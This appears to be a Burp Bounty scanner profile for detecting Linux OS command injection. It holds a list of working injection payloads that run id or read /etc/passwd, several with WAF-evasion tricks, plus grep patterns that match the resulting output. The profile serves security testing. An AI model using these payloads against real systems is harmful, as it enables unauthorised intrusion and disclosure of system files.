[
  {
    "ProfileName": "RCE_Linux",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@burpbounty",
    "Payloads": [
      " || id",
      " | id",
      " ; id",
      " \u0026\u0026 id",
      " \u0026 id",
      " `id`",
      " ;cat%20/etc/passwd",
      " ;cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      " ;cat$u /etc$u/passwd$u",
      " ;{cat,/etc/passwd}",
      " ;cat\u003c/etc/passwd",
      " ;cat$IFS/etc/passwd",
      " ;echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      " ;/usr/bin/id;",
      " |cat%20/etc/passwd",
      " |cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      " |cat$u /etc$u/passwd$u",
      " |{cat,/etc/passwd}",
      " |cat\u003c/etc/passwd",
      " |cat$IFS/etc/passwd",
      " |echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      " |/usr/bin/id|",
      " ||cat%20/etc/passwd",
      " ||cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      " ||cat$u /etc$u/passwd$u",
      " ||{cat,/etc/passwd}",
      " ||cat\u003c/etc/passwd",
      " ||cat$IFS/etc/passwd",
      " ||echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      " ||/usr/bin/id||",
      " \u0026\u0026cat%20/etc/passwd",
      " \u0026\u0026cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      " \u0026\u0026cat$u /etc$u/passwd$u",
      " \u0026\u0026{cat,/etc/passwd}",
      " \u0026\u0026cat\u003c/etc/passwd",
      " \u0026\u0026cat$IFS/etc/passwd",
      " \u0026\u0026echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      " \u0026\u0026/usr/bin/id\u0026\u0026",
      " \u0026cat%20/etc/passwd",
      " \u0026cat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      " \u0026cat$u /etc$u/passwd$u",
      " \u0026{cat,/etc/passwd}",
      " \u0026cat\u003c/etc/passwd",
      " \u0026cat$IFS/etc/passwd",
      " \u0026echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      " \u0026/usr/bin/id\u0026",
      " %0acat%20/etc/passwd",
      " %0acat /e${hahaha}tc/${heywaf}pas${catchthis}swd",
      " %0acat$u /etc$u/passwd$u",
      " %0a{cat,/etc/passwd}",
      " %0acat\u003c/etc/passwd",
      " %0acat$IFS/etc/passwd",
      " %0aecho${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd",
      " %0a/usr/bin/id%0a",
      " `cat%20/etc/passwd`",
      " `cat /e${hahaha}tc/${heywaf}pas${catchthis}swd`",
      " `cat$u /etc$u/passwd$u`",
      " `{cat,/etc/passwd}`",
      " `cat\u003c/etc/passwd`",
      " `cat$IFS/etc/passwd`",
      " `echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd`",
      " `/usr/bin/id`",
      " $(cat%20/etc/passwd)",
      " $(cat /e${hahaha}tc/${heywaf}pas${catchthis}swd)",
      " $(cat$u /etc$u/passwd$u)",
      " $({cat,/etc/passwd})",
      " $(cat\u003c/etc/passwd)",
      " $(cat$IFS/etc/passwd)",
      " $(echo${IFS}\"RCE\"${IFS}\u0026\u0026cat${IFS}/etc/passwd)",
      " $(/usr/bin/id)"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,.*uid\u003d.*gid\u003d.*groups\u003d.*",
      "true,Or,root:x",
      "true,Or,.*uid\u003d.*gid\u003d.*"
    ],
    "Tags": [
      "RCE",
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 2,
    "Scope": 0,
    "RedirType": 4,
    "MaxRedir": 3,
    "payloadPosition": 2,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "RCE_Linux",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "REFERENCES:\u003cbr/\u003e\u003cbr/\u003e\n* https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection\u003cbr/\u003e\u003cbr/\u003e\n* https://portswigger.net/web-security/os-command-injection\u003cbr/\u003e\u003cbr/\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      32,
      36,
      1,
      2,
      6,
      5,
      35,
      34,
      64,
      0,
      3,
      4
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]